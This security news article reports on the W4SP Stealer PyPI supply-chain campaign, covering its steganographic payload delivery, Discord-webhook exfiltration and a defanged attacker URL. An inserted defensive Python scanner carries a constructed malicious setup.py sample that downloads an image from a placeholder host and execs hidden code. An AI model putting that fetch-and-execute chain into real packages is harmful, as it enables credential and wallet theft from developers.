An ongoing supply chain attack is spreading the W4SP Stealer malware. So far, the malicious Python packages have infected over 100 people. In a technical write-up, Checkmarx researcher Josef Harush reports that the threat actor is still active and is still publishing more malicious packages.
The attacker claims that the malware is undetectable in order to boost sales. This attack is only the latest case that raises the risk to the software supply chain. The malicious code can steal the victim's credit cards, crypto wallets, passwords, Discord accounts, and other sensitive data from the victim's PC. Stolen data is then sent back to the attacker via a hard-coded Discord webhook address.
The threat actor offers the W4SP stealer for about $20, along with a claim that it is 'heavily' protected. The ongoing attacks therefore appear to be financially motivated. Checkmarx's investigation began when it received reports from Phylum and Check Point, which had spotted tens of W4SP stealers deployed to developers' systems.
The researchers also noted that the attacks were unusual in their use of steganography to conceal the polymorphic malware. The malware is hidden inside an image file hosted on Imgur. Once the malicious package is installed, its setup.py script runs and deploys further Python packages to the victim's system, including Judy, which provides the steganography utilities.
The setup.py script then downloads a .png image from Imgur and saves it in the operating system's temp directory. The script then calls the 'lsb.reveal' function from the Judy package to extract the hidden code from the downloaded image.
Once the extracted code is executed, it fetches further code from 'hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4'. The process ends with the system infected by the W4SP stealer.
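As an added illustration (not code from the Checkmarx write-up or from the campaign itself), the following Python script statically scans a setup.py for the install-time pattern described above: a network fetch, a steganography helper and dynamic execution of the result. The setup.py it scans is a constructed sample; the module name judyb (the PyPI spelling of the package the text calls Judy) and the Imgur URL are assumptions and placeholders.

```python
import ast

# Indicators taken from the campaign described above: an install-time network
# fetch, a steganography helper and dynamic code execution inside setup.py.
NETWORK_OR_STEGO_MODULES = {"judy", "judyb", "urllib", "requests"}
DYNAMIC_EXEC_CALLS = {"exec", "eval", "compile", "__import__"}
FETCH_OR_REVEAL_TAILS = {"reveal", "urlopen", "urlretrieve"}

def _call_name(node: ast.Call) -> str:
    """Dotted callee name, e.g. 'exec', 'lsb.reveal', 'urllib.request.urlretrieve'."""
    parts, func = [], node.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))

def scan_setup_py(source: str) -> dict:
    """Collect suspicious imports, calls and URL literals from setup.py source."""
    findings = {"imports": [], "calls": [], "urls": []}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            findings["imports"] += [a.name for a in node.names
                                    if a.name.split(".")[0] in NETWORK_OR_STEGO_MODULES]
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_OR_STEGO_MODULES:
                findings["imports"].append(node.module)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in DYNAMIC_EXEC_CALLS or name.rsplit(".", 1)[-1] in FETCH_OR_REVEAL_TAILS:
                findings["calls"].append(name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                findings["urls"].append(node.value)
    return findings

def is_suspicious(findings: dict) -> bool:
    """Flag when install-time code both fetches/decodes something and executes it."""
    runs_dynamic_code = any(c in DYNAMIC_EXEC_CALLS for c in findings["calls"])
    return runs_dynamic_code and bool(findings["imports"] or findings["urls"])

# Constructed setup.py fragment mimicking the described chain; the URL is a placeholder.
SAMPLE_SETUP_PY = '''
import tempfile, urllib.request
from judyb import lsb
path = tempfile.gettempdir() + "/img.png"
urllib.request.urlretrieve("https://i.imgur.com/PLACEHOLDER.png", path)
exec(lsb.reveal(path))
'''
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="ok", version="1.0")\n'
```

Run `scan_setup_py` over a package's setup.py before installing it; a hit from `is_suspicious` is a reason to read the file by hand, not proof of malice.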
Analysing the malicious code led the researcher to an open invitation to join the attacker's Discord server, which is run by a user dubbed 'Alpha.#0001'. The attacker is crafty: they create multiple fake user accounts that appear legitimate, copying profile descriptions from other popular accounts. As a result, hundreds of victims have incurred losses from this campaign.
The same actor has begun operating under the PyPI username 'halt' to upload typosquatting libraries, which use the StarJacking technique. For more information on how to protect your business today, contact us.